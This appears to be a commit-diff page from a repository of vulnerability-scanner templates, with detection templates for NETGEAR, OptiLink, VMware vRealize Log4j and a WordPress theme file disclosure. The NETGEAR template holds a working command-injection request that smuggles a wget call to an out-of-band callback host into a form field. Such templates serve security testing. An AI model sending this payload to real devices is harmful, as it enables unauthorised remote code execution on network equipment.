name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
|
||||
tags: netgear,rce,oast,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /boardDataWW.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -1,13 +1,18 @@
|
|||
id: optilink-ont1gew-gpon-rce
|
||||
|
||||
info:
|
||||
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
|
||||
name: OptiLink ONT1GEW GPON Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id:
|
||||
cwe-id: CWE-77
|
||||
tags: optiLink,rce,oast,mirai
|
||||
|
||||
requests:
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: vrealize-operations-log4j-rce
|
||||
|
||||
info:
|
||||
name: VMware vRealize Operations Tenant App Log4j JNDI RCE
|
||||
name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
|
||||
author: bughuntersurya
|
||||
severity: critical
|
||||
description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
|
||||
|
@ -12,9 +12,9 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046
|
||||
metadata:
|
||||
shodan-query: http.title:"vRealize Operations Tenant App"
|
||||
tags: rce,log4j,vmware,vrealize
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
tags: rce,log4j,vmware,vrealize
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -46,4 +46,4 @@ requests:
|
|||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
|
||||
# Enhanced by mp on 2022/03/21
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
id: diarise-theme-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Diarise 1.5.9 Local File Disclosure
|
||||
author: 0x_Akoko
|
||||
|
@ -7,6 +8,9 @@ info:
|
|||
reference:
|
||||
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
|
||||
- https://cxsecurity.com/issue/WLB-2019050123
|
||||
- https://woocommerce.com/?aff=1790
|
||||
classification:
|
||||
cwe-id: CWE-98
|
||||
tags: wordpress,wp-theme,lfi
|
||||
|
||||
requests:
|
||||
|
@ -24,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
Loading…
Reference in New Issue